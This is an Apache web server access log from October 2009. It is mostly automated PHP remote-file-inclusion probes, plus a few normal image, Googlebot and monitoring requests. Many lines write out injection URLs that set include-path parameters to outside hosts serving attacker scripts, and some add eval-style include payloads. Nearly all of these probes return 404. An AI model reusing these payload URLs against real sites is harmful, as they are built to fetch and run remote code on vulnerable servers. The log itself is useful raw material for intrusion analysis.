82.151.132.176 - - [18/Oct/2009:03:32:11 -0400] "GET /logs/access_log.Q109071100//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
213.8.115.172 - - [18/Oct/2009:03:32:40 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Dealio Toolbar 3.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
125.251.147.194 - - [18/Oct/2009:03:33:00 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:33:00 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:33:00 -0400] "GET /logs/access_log.Q109071200%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:33:01 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:33:01 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:33:01 -0400] "GET /logs/access_log.Q109071200%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.144.1.134 - - [18/Oct/2009:03:33:02 -0400] "GET /logs/error_log.Q109100300/index.php?redir=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
200.144.1.134 - - [18/Oct/2009:03:33:02 -0400] "GET /index.php?redir=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
200.144.1.134 - - [18/Oct/2009:03:33:06 -0400] "GET /logs/index.php?redir=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
82.151.132.176 - - [18/Oct/2009:03:33:16 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://dubnahome.ru//one.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
82.151.132.176 - - [18/Oct/2009:03:33:16 -0400] "GET /logs/access_log.Q109071000//modules/4nAlbum/public/displayCategory.php?basepath=http://dubnahome.ru//one.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
82.151.132.176 - - [18/Oct/2009:03:33:16 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://dubnahome.ru//one.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:03:33:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.151.132.176 - - [18/Oct/2009:03:33:44 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
82.151.132.176 - - [18/Oct/2009:03:33:50 -0400] "GET /logs/access_log.Q109071100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:33:55 -0400] "GET /logs/error_log.Q109071200%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:33:57 -0400] "GET /logs/error_log.Q109071200%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.249.71.152 - - [18/Oct/2009:03:33:40 -0400] "GET /logs/access_log.Q109062000 HTTP/1.1" 200 2302740 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
82.151.132.176 - - [18/Oct/2009:03:34:40 -0400] "GET /logs/access_log.Q109071000%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://dubnahome.ru//one.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:35:19 -0400] "GET ///index.php?p=http://www.birdmobile.net/fx29id1.txt%20? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:35:19 -0400] "GET /logs///index.php?p=http://www.birdmobile.net/fx29id1.txt%20? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:35:19 -0400] "GET /logs/access_log.Q109083000///index.php?p=http://www.birdmobile.net/fx29id1.txt%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.71.51 - - [18/Oct/2009:03:36:53 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1119AB4A3C88D800342702F+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.152 - - [18/Oct/2009:03:37:03 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1119AB4A3CD838003C2702F+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
125.251.147.194 - - [18/Oct/2009:03:37:15 -0400] "GET /logs/access_log.Q109083000%20%20///index.php?p=http://www.birdmobile.net/fx29id1.txt%20? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:37:15 -0400] "GET /logs/access_log.Q109093000%20%20///index.php?p=http://www.birdmobile.net/fx29id1.txt%20? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:37:25 -0400] "GET /logs///index.php?p=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:37:25 -0400] "GET ///index.php?p=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:37:25 -0400] "GET /logs/access_log.Q109083000///index.php?p=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.143.3.188 - - [18/Oct/2009:03:37:27 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
174.143.3.188 - - [18/Oct/2009:03:37:27 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
174.143.3.188 - - [18/Oct/2009:03:37:27 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
174.143.3.188 - - [18/Oct/2009:03:37:27 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
125.251.147.194 - - [18/Oct/2009:03:37:29 -0400] "GET /logs/access_log.Q109071400//faqsupport/samplefaqsupport.php?path[docroot]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:37:29 -0400] "GET /logs/access_log.Q109063000//faqsupport/samplefaqsupport.php?path[docroot]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:37:47 -0400] "GET /logs/access_log.Q109071400//faqsupport/samplefaqsupport.php?path[docroot]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:37:47 -0400] "GET /logs/access_log.Q109063000//faqsupport/samplefaqsupport.php?path[docroot]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:03:38:01 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:03:38:01 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:03:38:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.11.145.8 - - [18/Oct/2009:03:39:12 -0400] "GET ///index.php?p=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.11.145.8 - - [18/Oct/2009:03:39:12 -0400] "GET /logs///index.php?p=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.11.145.8 - - [18/Oct/2009:03:39:12 -0400] "GET /logs/access_log.Q109083000///index.php?p=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:39:18 -0400] "GET /logs/access_log.Q109083000%20%20///index.php?p=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:39:18 -0400] "GET /logs/access_log.Q109093000%20%20///index.php?p=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.144.1.134 - - [18/Oct/2009:03:39:27 -0400] "GET /logs/access_log.Q109071900/index.php?redir=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
132.66.247.88 - - [18/Oct/2009:03:39:29 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
132.66.247.88 - - [18/Oct/2009:03:39:29 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
132.66.247.88 - - [18/Oct/2009:03:39:31 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
132.66.247.88 - - [18/Oct/2009:03:39:31 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
125.251.147.194 - - [18/Oct/2009:03:40:02 -0400] "GET /logs/access_log.Q109093000///index.php?p=http://www.birdmobile.net/fx29id1.txt%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.38.18.81 - - [18/Oct/2009:03:40:02 -0400] "GET /logs/error_log.Q109100200//modules/4nAlbum/public/displayCategory.php?basepath=http://triton.100free.com/mic22? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:03:40:02 -0400] "GET /logs/error_log.Q109100200//modules/4nAlbum/public/displayCategory.php?basepath=http://triton.100free.com/mic22? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:03:40:02 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://triton.100free.com/mic22? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:03:40:02 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://triton.100free.com/mic22? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
125.251.147.194 - - [18/Oct/2009:03:40:27 -0400] "GET /logs/access_log.Q109071200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:40:33 -0400] "GET /logs/access_log.Q109071200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
65.38.18.81 - - [18/Oct/2009:03:40:39 -0400] "GET /logs/access_log.Q109100200//modules/4nAlbum/public/displayCategory.php?basepath=http://triton.100free.com/mic22? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:03:40:39 -0400] "GET /logs/access_log.Q109100200//modules/4nAlbum/public/displayCategory.php?basepath=http://triton.100free.com/mic22? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
125.251.147.194 - - [18/Oct/2009:03:40:45 -0400] "GET /logs/error_log.Q109071200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:40:52 -0400] "GET /logs/error_log.Q109071200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:41:59 -0400] "GET /logs/access_log.Q109093000///index.php?p=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.11.145.8 - - [18/Oct/2009:03:42:40 -0400] "GET /logs/access_log.Q109093000%20%20///index.php?p=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.11.145.8 - - [18/Oct/2009:03:42:41 -0400] "GET /logs/access_log.Q109083000%20%20///index.php?p=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:03:43:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.251.147.194 - - [18/Oct/2009:03:46:51 -0400] "GET /logs/error_log.Q109092700///index.php?p=http://www.birdmobile.net/sempak.jpg%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
125.251.147.194 - - [18/Oct/2009:03:46:51 -0400] "GET ///index.php?p=http://www.birdmobile.net/sempak.jpg%0D?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
125.251.147.194 - - [18/Oct/2009:03:46:51 -0400] "GET /logs///index.php?p=http://www.birdmobile.net/sempak.jpg%0D?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
125.251.147.194 - - [18/Oct/2009:03:47:11 -0400] "GET /logs/error_log.Q109060500///index.php?p=http://www.birdmobile.net/sempak.jpg%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
174.143.3.188 - - [18/Oct/2009:03:48:21 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Microsoft Pocket Internet Explorer/0.6"
174.143.3.188 - - [18/Oct/2009:03:48:21 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
174.143.3.188 - - [18/Oct/2009:03:48:21 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
174.143.3.188 - - [18/Oct/2009:03:48:21 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.61 [en] (OS/2; U)"
88.55.109.165 - - [18/Oct/2009:03:48:23 -0400] "GET /logs/error_log.Q109060500/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
88.55.109.165 - - [18/Oct/2009:03:48:23 -0400] "GET /index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
88.55.109.165 - - [18/Oct/2009:03:48:24 -0400] "GET /logs/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
146.164.41.5 - - [18/Oct/2009:03:48:29 -0400] "GET /logs/error_log.Q109060500/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
209.59.12.99 - - [18/Oct/2009:03:48:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
146.164.41.5 - - [18/Oct/2009:03:48:29 -0400] "GET /index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
146.164.41.5 - - [18/Oct/2009:03:48:29 -0400] "GET /logs/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
200.144.1.134 - - [18/Oct/2009:03:48:43 -0400] "GET /index.php?redir=http://fffmatheus.justfree.com/safeof.txt??????? HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
80.247.164.121 - - [18/Oct/2009:03:49:54 -0400] "GET /SSI.php?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
80.247.164.121 - - [18/Oct/2009:03:49:54 -0400] "GET /logs/SSI.php?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
80.247.164.121 - - [18/Oct/2009:03:49:54 -0400] "GET /logs/access_log.Q109052100%20%20/SSI.php?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:50:23 -0400] "GET /logs/access_log.Q109081100%20%20//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:50:23 -0400] "GET /logs/error_log.Q109081100%20%20//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:50:23 -0400] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:50:23 -0400] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:50:23 -0400] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:50:23 -0400] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:50:23 -0400] "GET /logs/access_log.Q109081100%20%20//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:50:23 -0400] "GET /logs/error_log.Q109081100%20%20//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
80.247.164.121 - - [18/Oct/2009:03:50:24 -0400] "GET /logs/error_log.Q109081800%20%20/SSI.php?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
146.164.41.5 - - [18/Oct/2009:03:50:59 -0400] "GET /logs/access_log.Q109060500/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
88.55.109.165 - - [18/Oct/2009:03:51:03 -0400] "GET /logs/access_log.Q109060500/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
64.27.9.117 - - [18/Oct/2009:03:51:24 -0400] "GET //include/mail.inc.php?skin_board_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:51:24 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:51:24 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:51:24 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:51:25 -0400] "GET //include/mail.inc.php?skin_board_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:51:25 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:51:25 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:51:25 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
187.4.48.90 - - [18/Oct/2009:03:51:46 -0400] "GET /logs/error_log.Q109060500/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 233 "-" "libwww-perl/5.813"
187.4.48.90 - - [18/Oct/2009:03:51:47 -0400] "GET /index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 207 "-" "libwww-perl/5.813"
187.4.48.90 - - [18/Oct/2009:03:51:47 -0400] "GET /logs/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 212 "-" "libwww-perl/5.813"
66.249.71.51 - - [18/Oct/2009:03:51:39 -0400] "GET /logs/error_log.Q109100500 HTTP/1.1" 200 4288347 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
71.6.151.148 - - [18/Oct/2009:03:52:40 -0400] "GET //index.php?DOCUMENT_ROOT=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
71.6.151.148 - - [18/Oct/2009:03:52:40 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
71.6.151.148 - - [18/Oct/2009:03:52:40 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
71.6.151.148 - - [18/Oct/2009:03:53:05 -0400] "GET /logs/error_log.Q109092300//index.php?DOCUMENT_ROOT=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.38.18.81 - - [18/Oct/2009:03:53:12 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://triton.100free.com/mic22? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:03:53:12 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://triton.100free.com/mic22? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
209.59.12.99 - - [18/Oct/2009:03:53:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.242.37.212 - - [18/Oct/2009:03:54:13 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:03:54:13 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:03:54:13 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:03:54:13 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
187.4.48.90 - - [18/Oct/2009:03:54:40 -0400] "GET /logs/access_log.Q109060500/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
71.6.151.148 - - [18/Oct/2009:03:54:42 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
71.6.151.148 - - [18/Oct/2009:03:54:48 -0400] "GET /logs/error_log.Q109092300%20%20//index.php?DOCUMENT_ROOT=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
